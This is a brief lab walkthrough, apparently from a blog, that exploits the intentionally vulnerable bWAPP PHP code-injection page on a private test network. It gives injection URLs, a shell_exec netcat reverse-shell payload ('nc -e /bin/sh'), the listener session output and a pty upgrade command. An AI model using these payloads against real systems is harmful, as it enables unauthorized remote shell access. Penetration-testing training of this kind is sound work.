in bWAPP There is a Insecure PHP Code Execution module. Our goal is to gain access to the vulnerable URL and get back a reverse connect shell using PHP functions.
We test the parameter 'message' for possible code injection. http://192.168.56.101/bWAPP/phpi.php?message=test. One way to do that is to append a semi-colon and some php instructions and see what the output will be. We first try to echo out phpinfo(); function.
http://192.168.56.101/bWAPP/phpi.php?message=test;phpinfo();
We got phpinfo() to display. Lets mmove on to executeing system commands with php and shell_exec().
As you can see we got back a successful directory listing of the current directory. Our next task is to get a reverse connect going so we can have terminal access to the remote host through netcat. Our URL will be http://192.168.56.101/bWAPP/phpi.php?message=test;echo+shell_exec("nc -e /bin/sh 192.168.56.1 8088%");. This should give us a connect back so we can issue commands from the terminal.
sam@ubuntu:~$ nc -nvlp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 49592 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bee-box:/var/www/bWAPP$
As you can see we got a connect back and a system shell to work from now on.
No comments:
Post a Comment